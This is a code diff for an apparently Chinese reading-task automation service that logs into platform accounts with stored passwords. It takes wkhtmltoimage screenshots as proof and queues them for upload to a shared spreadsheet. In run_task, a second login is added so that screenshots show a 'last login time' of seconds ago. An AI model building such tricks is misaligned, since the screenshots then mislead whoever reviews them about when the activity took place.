schedule.every().hour.do(cleanup_expired_captcha) schedule.every().hour.do(cleanup_expired_captcha)
quota_reset_time_cst = "00:00" quota_reset_time_cst = "00:00"
@@ -381,6 +411,7 @@ def scheduled_task_worker() -> None:
if is_first_run: if is_first_run:
logger.info(f"[定时任务] 已设置数据清理任务: 每天 CST {cleanup_time_cst}") logger.info(f"[定时任务] 已设置数据清理任务: 每天 CST {cleanup_time_cst}")
logger.info(f"[定时任务] 已设置风险分衰减: 每天 CST {risk_decay_time_cst}")
logger.info(f"[定时任务] 已设置验证码清理任务: 每小时执行一次") logger.info(f"[定时任务] 已设置验证码清理任务: 每小时执行一次")
logger.info(f"[定时任务] 已设置SMTP配额重置: 每天 CST {quota_reset_time_cst}") logger.info(f"[定时任务] 已设置SMTP配额重置: 每天 CST {quota_reset_time_cst}")

View File

@@ -3,15 +3,16 @@
from __future__ import annotations from __future__ import annotations
import os import os
import shutil
import subprocess
import time import time
import database import database
import email_service import email_service
from api_browser import APIBrowser, get_cookie_jar_path, is_cookie_jar_fresh
from app_config import get_config from app_config import get_config
from app_logger import get_logger from app_logger import get_logger
from browser_pool_worker import get_browser_worker_pool from browser_pool_worker import get_browser_worker_pool
from playwright_automation import PlaywrightAutomation
from services.browser_manager import get_browser_manager
from services.client_log import log_to_client from services.client_log import log_to_client
from services.runtime import get_socketio from services.runtime import get_socketio
from services.state import safe_get_account, safe_remove_task_status, safe_update_task_status from services.state import safe_get_account, safe_remove_task_status, safe_update_task_status
@@ -24,6 +25,165 @@ config = get_config()
SCREENSHOTS_DIR = config.SCREENSHOTS_DIR SCREENSHOTS_DIR = config.SCREENSHOTS_DIR
os.makedirs(SCREENSHOTS_DIR, exist_ok=True) os.makedirs(SCREENSHOTS_DIR, exist_ok=True)
_WKHTMLTOIMAGE_TIMEOUT_SECONDS = int(os.environ.get("WKHTMLTOIMAGE_TIMEOUT_SECONDS", "60"))
_WKHTMLTOIMAGE_JS_DELAY_MS = int(os.environ.get("WKHTMLTOIMAGE_JS_DELAY_MS", "3000"))
_WKHTMLTOIMAGE_WIDTH = int(os.environ.get("WKHTMLTOIMAGE_WIDTH", "1920"))
_WKHTMLTOIMAGE_HEIGHT = int(os.environ.get("WKHTMLTOIMAGE_HEIGHT", "1080"))
_WKHTMLTOIMAGE_QUALITY = int(os.environ.get("WKHTMLTOIMAGE_QUALITY", "95"))
_WKHTMLTOIMAGE_ZOOM = float(os.environ.get("WKHTMLTOIMAGE_ZOOM", "1.0"))
_WKHTMLTOIMAGE_FULL_PAGE = str(os.environ.get("WKHTMLTOIMAGE_FULL_PAGE", "")).strip().lower() in (
"1",
"true",
"yes",
"on",
)
_env_crop_w = os.environ.get("WKHTMLTOIMAGE_CROP_WIDTH")
_env_crop_h = os.environ.get("WKHTMLTOIMAGE_CROP_HEIGHT")
_WKHTMLTOIMAGE_CROP_WIDTH = int(_env_crop_w) if _env_crop_w is not None else _WKHTMLTOIMAGE_WIDTH
_WKHTMLTOIMAGE_CROP_HEIGHT = (
int(_env_crop_h) if _env_crop_h is not None else (_WKHTMLTOIMAGE_HEIGHT if _WKHTMLTOIMAGE_HEIGHT > 0 else 0)
)
_WKHTMLTOIMAGE_CROP_X = int(os.environ.get("WKHTMLTOIMAGE_CROP_X", "0"))
_WKHTMLTOIMAGE_CROP_Y = int(os.environ.get("WKHTMLTOIMAGE_CROP_Y", "0"))
_WKHTMLTOIMAGE_UA = os.environ.get(
"WKHTMLTOIMAGE_USER_AGENT",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
)
def _resolve_wkhtmltoimage_path() -> str | None:
return os.environ.get("WKHTMLTOIMAGE_PATH") or shutil.which("wkhtmltoimage")
def _read_cookie_pairs(cookies_path: str) -> list[tuple[str, str]]:
if not cookies_path or not os.path.exists(cookies_path):
return []
pairs = []
try:
with open(cookies_path, "r", encoding="utf-8", errors="ignore") as f:
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
parts = line.split("\t")
if len(parts) < 7:
continue
name = parts[5].strip()
value = parts[6].strip()
if name:
pairs.append((name, value))
except Exception:
return []
return pairs
def _select_cookie_pairs(pairs: list[tuple[str, str]]) -> list[tuple[str, str]]:
preferred_names = {"ASP.NET_SessionId", ".ASPXAUTH"}
preferred = [(name, value) for name, value in pairs if name in preferred_names and value]
if preferred:
return preferred
return [(name, value) for name, value in pairs if name and value and name.isascii() and value.isascii()]
def _ensure_login_cookies(account, proxy_config, log_callback) -> bool:
"""确保有可用的登录 cookies通过 API 登录刷新)"""
try:
with APIBrowser(log_callback=log_callback, proxy_config=proxy_config) as api_browser:
if not api_browser.login(account.username, account.password):
return False
return api_browser.save_cookies_for_screenshot(account.username)
except Exception:
return False
def take_screenshot_wkhtmltoimage(
url: str,
output_path: str,
cookies_path: str | None = None,
proxy_server: str | None = None,
run_script: str | None = None,
window_status: str | None = None,
log_callback=None,
) -> bool:
wkhtmltoimage_path = _resolve_wkhtmltoimage_path()
if not wkhtmltoimage_path:
if log_callback:
log_callback("wkhtmltoimage 未安装或不在 PATH 中")
return False
ext = os.path.splitext(output_path)[1].lower()
image_format = "jpg" if ext in (".jpg", ".jpeg") else "png"
cmd = [
wkhtmltoimage_path,
"--format",
image_format,
"--width",
str(_WKHTMLTOIMAGE_WIDTH),
"--disable-smart-width",
"--javascript-delay",
str(_WKHTMLTOIMAGE_JS_DELAY_MS),
"--load-error-handling",
"ignore",
"--enable-local-file-access",
"--encoding",
"utf-8",
]
if _WKHTMLTOIMAGE_UA:
cmd.extend(["--custom-header", "User-Agent", _WKHTMLTOIMAGE_UA, "--custom-header-propagation"])
if image_format in ("jpg", "jpeg"):
cmd.extend(["--quality", str(_WKHTMLTOIMAGE_QUALITY)])
if _WKHTMLTOIMAGE_HEIGHT > 0 and not _WKHTMLTOIMAGE_FULL_PAGE:
cmd.extend(["--height", str(_WKHTMLTOIMAGE_HEIGHT)])
if abs(_WKHTMLTOIMAGE_ZOOM - 1.0) > 1e-6:
cmd.extend(["--zoom", str(_WKHTMLTOIMAGE_ZOOM)])
if not _WKHTMLTOIMAGE_FULL_PAGE and (_WKHTMLTOIMAGE_CROP_WIDTH > 0 or _WKHTMLTOIMAGE_CROP_HEIGHT > 0):
cmd.extend(["--crop-x", str(_WKHTMLTOIMAGE_CROP_X), "--crop-y", str(_WKHTMLTOIMAGE_CROP_Y)])
if _WKHTMLTOIMAGE_CROP_WIDTH > 0:
cmd.extend(["--crop-w", str(_WKHTMLTOIMAGE_CROP_WIDTH)])
if _WKHTMLTOIMAGE_CROP_HEIGHT > 0:
cmd.extend(["--crop-h", str(_WKHTMLTOIMAGE_CROP_HEIGHT)])
if run_script:
cmd.extend(["--run-script", run_script])
if window_status:
cmd.extend(["--window-status", window_status])
if cookies_path:
cookie_pairs = _select_cookie_pairs(_read_cookie_pairs(cookies_path))
if cookie_pairs:
for name, value in cookie_pairs:
cmd.extend(["--cookie", name, value])
else:
cmd.extend(["--cookie-jar", cookies_path])
if proxy_server:
cmd.extend(["--proxy", proxy_server])
cmd.extend([url, output_path])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=_WKHTMLTOIMAGE_TIMEOUT_SECONDS)
if result.returncode != 0:
if log_callback:
err_msg = (result.stderr or result.stdout or "").strip()
log_callback(f"wkhtmltoimage 截图失败: {err_msg[:200]}")
return False
return True
except subprocess.TimeoutExpired:
if log_callback:
log_callback("wkhtmltoimage 截图超时")
return False
except Exception as e:
if log_callback:
log_callback(f"wkhtmltoimage 截图异常: {e}")
return False
def _emit(event: str, data: object, *, room: str | None = None) -> None: def _emit(event: str, data: object, *, room: str | None = None) -> None:
try: try:
@@ -42,7 +202,7 @@ def take_screenshot_for_account(
task_start_time=None, task_start_time=None,
browse_result=None, browse_result=None,
): ):
"""为账号任务完成后截图(使用工作线程池,真正的浏览器复用""" """为账号任务完成后截图(使用截图线程池并发执行"""
account = safe_get_account(user_id, account_id) account = safe_get_account(user_id, account_id)
if not account: if not account:
return return
@@ -63,9 +223,11 @@ def take_screenshot_for_account(
_emit("account_update", acc.to_dict(), room=f"user_{user_id}") _emit("account_update", acc.to_dict(), room=f"user_{user_id}")
max_retries = 3 max_retries = 3
proxy_config = account.proxy_config if hasattr(account, "proxy_config") else None
proxy_server = proxy_config.get("server") if proxy_config else None
cookie_path = get_cookie_jar_path(account.username)
for attempt in range(1, max_retries + 1): for attempt in range(1, max_retries + 1):
automation = None
try: try:
safe_update_task_status( safe_update_task_status(
account_id, account_id,
@@ -75,27 +237,21 @@ def take_screenshot_for_account(
if attempt > 1: if attempt > 1:
log_to_client(f"🔄 第 {attempt} 次截图尝试...", user_id, account_id) log_to_client(f"🔄 第 {attempt} 次截图尝试...", user_id, account_id)
worker_id = browser_instance.get("worker_id", "?") if isinstance(browser_instance, dict) else "?"
use_count = browser_instance.get("use_count", 0) if isinstance(browser_instance, dict) else 0
log_to_client( log_to_client(
f"使用Worker-{browser_instance['worker_id']}的浏览器(已使用{browser_instance['use_count']}次)", f"使用Worker-{worker_id}执行截图(已执行{use_count}次)",
user_id, user_id,
account_id, account_id,
) )
proxy_config = account.proxy_config if hasattr(account, "proxy_config") else None
automation = PlaywrightAutomation(get_browser_manager(), account_id, proxy_config=proxy_config)
automation.playwright = browser_instance["playwright"]
automation.browser = browser_instance["browser"]
def custom_log(message: str): def custom_log(message: str):
log_to_client(message, user_id, account_id) log_to_client(message, user_id, account_id)
automation.log = custom_log if not is_cookie_jar_fresh(cookie_path) or attempt > 1:
log_to_client("正在刷新登录态...", user_id, account_id)
log_to_client("登录中...", user_id, account_id) if not _ensure_login_cookies(account, proxy_config, custom_log):
login_result = automation.quick_login(account.username, account.password, account.remember) log_to_client("截图登录失败", user_id, account_id)
if not login_result["success"]:
error_message = login_result.get("message", "截图登录失败")
log_to_client(f"截图登录失败: {error_message}", user_id, account_id)
if attempt < max_retries: if attempt < max_retries:
log_to_client("将重试...", user_id, account_id) log_to_client("将重试...", user_id, account_id)
time.sleep(2) time.sleep(2)
@@ -105,9 +261,6 @@ def take_screenshot_for_account(
log_to_client(f"导航到 '{browse_type}' 页面...", user_id, account_id) log_to_client(f"导航到 '{browse_type}' 页面...", user_id, account_id)
# 截图场景:优先用 bz 参数直达页面(更稳定,避免页面按钮点击失败导致截图跑偏)
navigated = False
try:
from urllib.parse import urlsplit from urllib.parse import urlsplit
parsed = urlsplit(config.ZSGL_LOGIN_URL) parsed = urlsplit(config.ZSGL_LOGIN_URL)
@@ -117,58 +270,37 @@ def take_screenshot_for_account(
else: else:
bz = 2 # 应读 bz = 2 # 应读
target_url = f"{base}/admin/center.aspx?bz={bz}" target_url = f"{base}/admin/center.aspx?bz={bz}"
# 目标:保留外层框架(左侧菜单/顶部栏),仅在 mainframe 内部导航到目标内容页 index_url = config.ZSGL_INDEX_URL or f"{base}/admin/index.aspx"
iframe = None run_script = (
try: "(function(){"
iframe = automation.get_iframe_safe(retry=True, max_retries=5) "function done(){window.status='ready';}"
except Exception: "function ensureNav(){try{if(typeof loadMenuTree==='function'){loadMenuTree(true);}}catch(e){}}"
iframe = None "function expandMenu(){"
"try{var body=document.body;if(body&&body.classList.contains('lay-mini')){body.classList.remove('lay-mini');}}catch(e){}"
if iframe: "try{if(typeof mainPageResize==='function'){mainPageResize();}}catch(e){}"
iframe.goto(target_url, timeout=60000) "try{if(typeof toggleMainMenu==='function' && document.body && document.body.classList.contains('lay-mini')){toggleMainMenu();}}catch(e){}"
current_url = getattr(iframe, "url", "") or "" "try{var navRight=document.querySelector('.nav-right');if(navRight){navRight.style.display='block';}}catch(e){}"
if "center.aspx" not in current_url: "try{var mainNav=document.getElementById('main-nav');if(mainNav){mainNav.style.display='block';}}catch(e){}"
raise RuntimeError(f"unexpected_iframe_url:{current_url}") "}"
try: "function navReady(){"
iframe.wait_for_load_state("networkidle", timeout=10000) "try{var nav=document.getElementById('sidebar-nav');return nav && nav.querySelectorAll('a').length>0;}catch(e){return false;}"
except Exception: "}"
pass "function frameReady(){"
try: "try{var f=document.getElementById('mainframe');return f && f.contentDocument && f.contentDocument.readyState==='complete';}catch(e){return false;}"
iframe.wait_for_selector("table.ltable", timeout=5000) "}"
except Exception: "function check(){"
pass "if(navReady() && frameReady()){done();return;}"
else: "setTimeout(check,300);"
# 兜底:若获取不到 iframe则退回到主页面直达 "}"
automation.main_page.goto(target_url, timeout=60000) "var f=document.getElementById('mainframe');"
current_url = getattr(automation.main_page, "url", "") or "" "ensureNav();"
if "center.aspx" not in current_url: "expandMenu();"
raise RuntimeError(f"unexpected_url:{current_url}") "if(!f){done();return;}"
try: f"f.src='{target_url}';"
automation.main_page.wait_for_load_state("networkidle", timeout=10000) "f.onload=function(){ensureNav();expandMenu();setTimeout(check,300);};"
except Exception: "setTimeout(check,5000);"
pass "})();"
try:
automation.main_page.wait_for_selector("table.ltable", timeout=5000)
except Exception:
pass
navigated = True
except Exception as nav_error:
log_to_client(f"直达页面失败,将尝试按钮切换: {str(nav_error)[:120]}", user_id, account_id)
# 兼容兜底:若直达失败,则回退到原有按钮切换方式
if not navigated:
result = automation.browse_content(
navigate_only=True,
browse_type=browse_type,
auto_next_page=False,
auto_view_attachments=False,
interval=0,
should_stop_callback=None,
) )
if not result.success and result.error_message:
log_to_client(f"导航警告: {result.error_message}", user_id, account_id)
time.sleep(2)
timestamp = get_beijing_now().strftime("%Y%m%d_%H%M%S") timestamp = get_beijing_now().strftime("%Y%m%d_%H%M%S")
@@ -178,7 +310,22 @@ def take_screenshot_for_account(
screenshot_filename = f"{username_prefix}_{login_account}_{browse_type}_{timestamp}.jpg" screenshot_filename = f"{username_prefix}_{login_account}_{browse_type}_{timestamp}.jpg"
screenshot_path = os.path.join(SCREENSHOTS_DIR, screenshot_filename) screenshot_path = os.path.join(SCREENSHOTS_DIR, screenshot_filename)
if automation.take_screenshot(screenshot_path): cookies_for_shot = cookie_path if is_cookie_jar_fresh(cookie_path) else None
if take_screenshot_wkhtmltoimage(
index_url,
screenshot_path,
cookies_path=cookies_for_shot,
proxy_server=proxy_server,
run_script=run_script,
window_status="ready",
log_callback=custom_log,
) or take_screenshot_wkhtmltoimage(
target_url,
screenshot_path,
cookies_path=cookies_for_shot,
proxy_server=proxy_server,
log_callback=custom_log,
):
if os.path.exists(screenshot_path) and os.path.getsize(screenshot_path) > 1000: if os.path.exists(screenshot_path) and os.path.getsize(screenshot_path) > 1000:
log_to_client(f"✓ 截图成功: {screenshot_filename}", user_id, account_id) log_to_client(f"✓ 截图成功: {screenshot_filename}", user_id, account_id)
return {"success": True, "filename": screenshot_filename} return {"success": True, "filename": screenshot_filename}
@@ -197,15 +344,6 @@ def take_screenshot_for_account(
if attempt < max_retries: if attempt < max_retries:
log_to_client("将重试...", user_id, account_id) log_to_client("将重试...", user_id, account_id)
time.sleep(2) time.sleep(2)
finally:
if automation:
try:
if automation.context:
automation.context.close()
automation.context = None
automation.page = None
except Exception as e:
logger.debug(f"关闭context时出错: {e}")
return {"success": False, "error": "截图失败已重试3次"} return {"success": False, "error": "截图失败已重试3次"}
@@ -250,6 +388,35 @@ def take_screenshot_for_account(
account_name = account.remark if account.remark else account.username account_name = account.remark if account.remark else account.username
try:
if screenshot_path and result and result.get("success"):
cfg = database.get_system_config() or {}
if int(cfg.get("kdocs_enabled", 0) or 0) == 1:
doc_url = (cfg.get("kdocs_doc_url") or "").strip()
if doc_url:
user_cfg = database.get_user_kdocs_settings(user_id) or {}
if int(user_cfg.get("kdocs_auto_upload", 0) or 0) == 1:
unit = (user_cfg.get("kdocs_unit") or cfg.get("kdocs_default_unit") or "").strip()
name = (account.remark or "").strip()
if unit and name:
from services.kdocs_uploader import get_kdocs_uploader
ok = get_kdocs_uploader().enqueue_upload(
user_id=user_id,
account_id=account_id,
unit=unit,
name=name,
image_path=screenshot_path,
)
if not ok:
log_to_client("表格上传排队失败: 队列已满", user_id, account_id)
else:
if not unit:
log_to_client("表格上传跳过: 未配置县区", user_id, account_id)
if not name:
log_to_client("表格上传跳过: 账号备注为空", user_id, account_id)
except Exception as kdocs_error:
logger.warning(f"表格上传任务提交失败: {kdocs_error}")
if batch_id: if batch_id:
_batch_task_record_result( _batch_task_record_result(
batch_id=batch_id, batch_id=batch_id,

View File

@@ -573,8 +573,16 @@ def run_task(user_id, account_id, browse_type, enable_screenshot=True, source="m
with APIBrowser(log_callback=custom_log, proxy_config=proxy_config) as api_browser: with APIBrowser(log_callback=custom_log, proxy_config=proxy_config) as api_browser:
if api_browser.login(account.username, account.password): if api_browser.login(account.username, account.password):
log_to_client("✓ 登录成功", user_id, account_id) log_to_client("首次登录成功,刷新登录时间...", user_id, account_id)
api_browser.save_cookies_for_playwright(account.username)
# 二次登录:让"上次登录时间"变成刚才首次登录的时间
# 这样截图时显示的"上次登录时间"就是几秒前而不是昨天
if api_browser.login(account.username, account.password):
log_to_client("✓ 二次登录成功!", user_id, account_id)
else:
log_to_client("⚠ 二次登录失败,继续使用首次登录状态", user_id, account_id)
api_browser.save_cookies_for_screenshot(account.username)
database.reset_account_login_status(account_id) database.reset_account_login_status(account_id)
if not account.remark: if not account.remark:

View File

@@ -5,8 +5,8 @@
<link rel="icon" type="image/svg+xml" href="./vite.svg" /> <link rel="icon" type="image/svg+xml" href="./vite.svg" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>后台管理 - 知识管理平台</title> <title>后台管理 - 知识管理平台</title>
<script type="module" crossorigin src="./assets/index-CdjS44Uj.js"></script> <script type="module" crossorigin src="./assets/index-DKH_HvPt.js"></script>
<link rel="stylesheet" crossorigin href="./assets/index-EWm4DZW8.css"> <link rel="stylesheet" crossorigin href="./assets/index-_5Ec1Hmd.css">
</head> </head>
<body> <body>
<div id="app"></div> <div id="app"></div>

View File

@@ -4,8 +4,8 @@
<meta charset="UTF-8" /> <meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<title>知识管理平台</title> <title>知识管理平台</title>
<script type="module" crossorigin src="./assets/index-DhsLPY8p.js"></script> <script type="module" crossorigin src="./assets/index-7hTgh8K-.js"></script>
<link rel="stylesheet" crossorigin href="./assets/index-CD3NfpmF.css"> <link rel="stylesheet" crossorigin href="./assets/index-BVjJVlht.css">
</head> </head>
<body> <body>
<noscript>该页面需要启用 JavaScript 才能使用。</noscript> <noscript>该页面需要启用 JavaScript 才能使用。</noscript>

View File

@@ -5,13 +5,48 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />
<title>后台管理 - 知识管理平台</title> <title>后台管理 - 知识管理平台</title>
{% for css_file in admin_spa_css_files %} {% for css_file in admin_spa_css_files %}
{% if admin_spa_build_id %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file, v=admin_spa_build_id) }}" />
{% else %}
<link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file) }}" /> <link rel="stylesheet" href="{{ url_for('serve_static', filename=css_file) }}" />
{% endif %}
{% endfor %} {% endfor %}
</head> </head>
<body> <body>
<noscript>该页面需要启用 JavaScript 才能使用。</noscript> <noscript>该页面需要启用 JavaScript 才能使用。</noscript>
<script>
(function () {
var search = window.location.search || ''
if (search.indexOf('legacy=1') !== -1) {
return
}
var needsLegacy = false
try {
new Function('let a = 1; const b = 2;')
} catch (e) {
needsLegacy = true
}
if (!window.Promise || !window.Proxy) {
needsLegacy = true
}
if (needsLegacy) {
var href = window.location.href
var hash = ''
var hashIndex = href.indexOf('#')
if (hashIndex !== -1) {
hash = href.slice(hashIndex)
href = href.slice(0, hashIndex)
}
var sep = href.indexOf('?') !== -1 ? '&' : '?'
window.location.replace(href + sep + 'legacy=1' + hash)
}
})()
</script>
<div id="app"></div> <div id="app"></div>
{% if admin_spa_build_id %}
<script type="module" src="{{ url_for('serve_static', filename=admin_spa_js_file, v=admin_spa_build_id) }}"></script>
{% else %}
<script type="module" src="{{ url_for('serve_static', filename=admin_spa_js_file) }}"></script> <script type="module" src="{{ url_for('serve_static', filename=admin_spa_js_file) }}"></script>
{% endif %}
</body> </body>
</html> </html>

View File

@@ -754,9 +754,6 @@
<div id="tab-pending" class="tab-content active"> <div id="tab-pending" class="tab-content active">
<h3 style="margin-bottom: 15px; font-size: 16px;">用户注册审核</h3> <h3 style="margin-bottom: 15px; font-size: 16px;">用户注册审核</h3>
<div id="pendingUsersList"></div> <div id="pendingUsersList"></div>
<h3 style="margin-top: 30px; margin-bottom: 15px; font-size: 16px;">密码重置审核</h3>
<div id="passwordResetsList"></div>
</div> </div>
<!-- 所有用户 --> <!-- 所有用户 -->
@@ -811,7 +808,7 @@
<label>截图最大并发数</label> <label>截图最大并发数</label>
<input type="number" id="maxScreenshotConcurrent" min="1" value="3" style="max-width: 200px;"> <input type="number" id="maxScreenshotConcurrent" min="1" value="3" style="max-width: 200px;">
<div style="font-size: 12px; color: #666; margin-top: 5px;"> <div style="font-size: 12px; color: #666; margin-top: 5px;">
说明:同时进行截图的最大数量。每个浏览器约占用200MB内存 说明:同时进行截图的最大数量。wkhtmltoimage 资源占用较低,可按需提高
</div> </div>
</div> </div>
@@ -825,7 +822,7 @@
启用定时任务 启用定时任务
</label> </label>
<div style="font-size: 12px; color: #666; margin-top: 5px;"> <div style="font-size: 12px; color: #666; margin-top: 5px;">
开启后,系统将在指定时间自动执行所有账号的浏览任务(不包含截图) 开启后,系统将在指定时间自动执行所有账号的浏览任务,是否截图由下方开关决定。
</div> </div>
</div> </div>
@@ -882,6 +879,16 @@
</div> </div>
</div> </div>
<div class="form-group" id="scheduleScreenshotGroup" style="display: none;">
<label style="display: flex; align-items: center; gap: 10px;">
<input type="checkbox" id="enableScreenshot" style="width: auto; max-width: none;">
定时任务截图
</label>
<div style="font-size: 12px; color: #666; margin-top: 5px;">
开启后,定时任务执行时会生成截图。
</div>
</div>
<div id="scheduleActions" style="margin-top: 15px; display: flex; gap: 10px;"> <div id="scheduleActions" style="margin-top: 15px; display: flex; gap: 10px;">
<button class="btn btn-primary" onclick="updateSchedule()">保存定时任务配置</button> <button class="btn btn-primary" onclick="updateSchedule()">保存定时任务配置</button>
<button class="btn btn-success" onclick="executeScheduleNow()" style="background: linear-gradient(135deg, #11998e 0%, #38ef7d 100%);"> <button class="btn btn-success" onclick="executeScheduleNow()" style="background: linear-gradient(135deg, #11998e 0%, #38ef7d 100%);">
@@ -1226,6 +1233,18 @@
<label>公告内容</label> <label>公告内容</label>
<textarea id="announcementContent" rows="5" placeholder="请输入公告内容(将以弹窗形式展示)"></textarea> <textarea id="announcementContent" rows="5" placeholder="请输入公告内容(将以弹窗形式展示)"></textarea>
</div> </div>
<div class="form-group">
<label>公告图片(可选)</label>
<div style="display: flex; align-items: center; gap: 10px; flex-wrap: wrap;">
<button class="btn btn-secondary" onclick="triggerAnnouncementImageUpload()">+ 上传图片</button>
<button class="btn" onclick="clearAnnouncementImage()" style="background: #eee;">移除</button>
<input type="file" id="announcementImageFile" accept="image/*" style="display: none;" onchange="uploadAnnouncementImageFile()">
<input type="text" id="announcementImageUrl" placeholder="上传后自动填充" readonly style="flex: 1; min-width: 220px;">
</div>
<div id="announcementImagePreview" style="display: none; margin-top: 8px;">
<img id="announcementImagePreviewImg" src="" alt="公告图片预览" style="max-width: 260px; max-height: 160px; border-radius: 8px; border: 1px solid #e5e7eb; object-fit: contain;">
</div>
</div>
<div style="display: flex; gap: 10px; flex-wrap: wrap;"> <div style="display: flex; gap: 10px; flex-wrap: wrap;">
<button class="btn btn-primary" onclick="createAnnouncement(true)">发布并启用</button> <button class="btn btn-primary" onclick="createAnnouncement(true)">发布并启用</button>
<button class="btn btn-secondary" onclick="createAnnouncement(false)">保存但不启用</button> <button class="btn btn-secondary" onclick="createAnnouncement(false)">保存但不启用</button>
@@ -1536,7 +1555,6 @@
loadAnnouncements(); loadAnnouncements();
loadSystemConfig(); loadSystemConfig();
loadProxyConfig(); loadProxyConfig();
loadPasswordResets(); // 修复: 初始化时也加载密码重置申请
loadFeedbacks(); // 加载反馈统计更新徽章 loadFeedbacks(); // 加载反馈统计更新徽章
// 恢复上次的标签页 // 恢复上次的标签页
@@ -1626,6 +1644,7 @@
<th style="width: 70px;">ID</th> <th style="width: 70px;">ID</th>
<th>标题</th> <th>标题</th>
<th style="width: 90px;">状态</th> <th style="width: 90px;">状态</th>
<th style="width: 70px;">图片</th>
<th style="width: 170px;">创建时间</th> <th style="width: 170px;">创建时间</th>
<th style="width: 220px;">操作</th> <th style="width: 220px;">操作</th>
</tr> </tr>
@@ -1640,6 +1659,7 @@
${a.is_active ? '启用' : '停用'} ${a.is_active ? '启用' : '停用'}
</span> </span>
</td> </td>
<td>${a.image_url ? '有图' : '-'}</td>
<td>${a.created_at || '-'}</td> <td>${a.created_at || '-'}</td>
<td> <td>
<div class="action-buttons"> <div class="action-buttons">
@@ -1664,17 +1684,82 @@
const content = document.getElementById('announcementContent'); const content = document.getElementById('announcementContent');
if (title) title.value = ''; if (title) title.value = '';
if (content) content.value = ''; if (content) content.value = '';
clearAnnouncementImage();
}
function triggerAnnouncementImageUpload() {
const input = document.getElementById('announcementImageFile');
if (input) input.click();
}
async function uploadAnnouncementImageFile() {
const input = document.getElementById('announcementImageFile');
const urlInput = document.getElementById('announcementImageUrl');
const file = input?.files?.[0];
if (!file || !urlInput) return;
if (file.type && !String(file.type).startsWith('image/')) {
showNotification('请选择图片文件', 'error');
input.value = '';
return;
}
const formData = new FormData();
formData.append('file', file);
try {
const response = await fetch('/yuyx/api/announcements/upload_image', {
method: 'POST',
body: formData
});
const data = await response.json();
if (!response.ok || !data?.success) {
showNotification(data?.error || '上传失败', 'error');
return;
}
urlInput.value = data.url || '';
updateAnnouncementImagePreview();
showNotification('上传成功', 'success');
} catch (e) {
showNotification('上传失败', 'error');
} finally {
input.value = '';
}
}
function clearAnnouncementImage() {
const imageUrl = document.getElementById('announcementImageUrl');
const imageFile = document.getElementById('announcementImageFile');
if (imageUrl) imageUrl.value = '';
if (imageFile) imageFile.value = '';
updateAnnouncementImagePreview();
}
function updateAnnouncementImagePreview() {
const imageUrl = document.getElementById('announcementImageUrl');
const previewWrap = document.getElementById('announcementImagePreview');
const previewImg = document.getElementById('announcementImagePreviewImg');
if (!imageUrl || !previewWrap || !previewImg) return;
const url = String(imageUrl.value || '').trim();
if (url) {
previewImg.src = url;
previewWrap.style.display = 'block';
} else {
previewImg.removeAttribute('src');
previewWrap.style.display = 'none';
}
} }
function viewAnnouncement(id) { function viewAnnouncement(id) {
const announcement = announcements.find(a => a.id === id); const announcement = announcements.find(a => a.id === id);
if (!announcement) return; if (!announcement) return;
alert(`标题:${announcement.title || ''}\n\n内容:\n${announcement.content || ''}`); const imageLine = announcement.image_url ? `\n图片:${announcement.image_url}` : '';
alert(`标题:${announcement.title || ''}${imageLine}\n\n内容:\n${announcement.content || ''}`);
} }
async function createAnnouncement(isActive) { async function createAnnouncement(isActive) {
const title = (document.getElementById('announcementTitle')?.value || '').trim(); const title = (document.getElementById('announcementTitle')?.value || '').trim();
const content = (document.getElementById('announcementContent')?.value || '').trim(); const content = (document.getElementById('announcementContent')?.value || '').trim();
const image_url = (document.getElementById('announcementImageUrl')?.value || '').trim();
if (!title || !content) { if (!title || !content) {
showNotification('标题和内容不能为空', 'error'); showNotification('标题和内容不能为空', 'error');
return; return;
@@ -1684,7 +1769,7 @@
const response = await fetch('/yuyx/api/announcements', { const response = await fetch('/yuyx/api/announcements', {
method: 'POST', method: 'POST',
headers: { 'Content-Type': 'application/json' }, headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ title, content, is_active: !!isActive }) body: JSON.stringify({ title, content, image_url, is_active: !!isActive })
}); });
const data = await response.json(); const data = await response.json();
if (!response.ok) { if (!response.ok) {
@@ -2048,8 +2133,13 @@
return; return;
} }
if (newPassword.length < 6) { if (newPassword.length < 8) {
showNotification('密码至少6个字符', 'error'); showNotification('密码长度至少8位', 'error');
return;
}
if (!/[a-zA-Z]/.test(newPassword) || !/\d/.test(newPassword)) {
showNotification('密码必须包含字母和数字', 'error');
return; return;
} }
@@ -2107,6 +2197,8 @@
document.getElementById('scheduleEnabled').checked = config.schedule_enabled === 1; document.getElementById('scheduleEnabled').checked = config.schedule_enabled === 1;
document.getElementById('scheduleTime').value = config.schedule_time || '02:00'; document.getElementById('scheduleTime').value = config.schedule_time || '02:00';
document.getElementById('scheduleBrowseType').value = config.schedule_browse_type || '应读'; document.getElementById('scheduleBrowseType').value = config.schedule_browse_type || '应读';
var enableScreenshot = config.enable_screenshot;
document.getElementById('enableScreenshot').checked = enableScreenshot === 1 || enableScreenshot === true || enableScreenshot === undefined;
// 加载星期选择 // 加载星期选择
const weekdays = config.schedule_weekdays || '1,2,3,4,5,6,7'; const weekdays = config.schedule_weekdays || '1,2,3,4,5,6,7';
@@ -2132,15 +2224,18 @@
const timeGroup = document.getElementById('scheduleTimeGroup'); const timeGroup = document.getElementById('scheduleTimeGroup');
const browseTypeGroup = document.getElementById('scheduleBrowseTypeGroup'); const browseTypeGroup = document.getElementById('scheduleBrowseTypeGroup');
const weekdaysGroup = document.getElementById('scheduleWeekdaysGroup'); const weekdaysGroup = document.getElementById('scheduleWeekdaysGroup');
const screenshotGroup = document.getElementById('scheduleScreenshotGroup');
if (enabled) { if (enabled) {
timeGroup.style.display = 'block'; timeGroup.style.display = 'block';
browseTypeGroup.style.display = 'block'; browseTypeGroup.style.display = 'block';
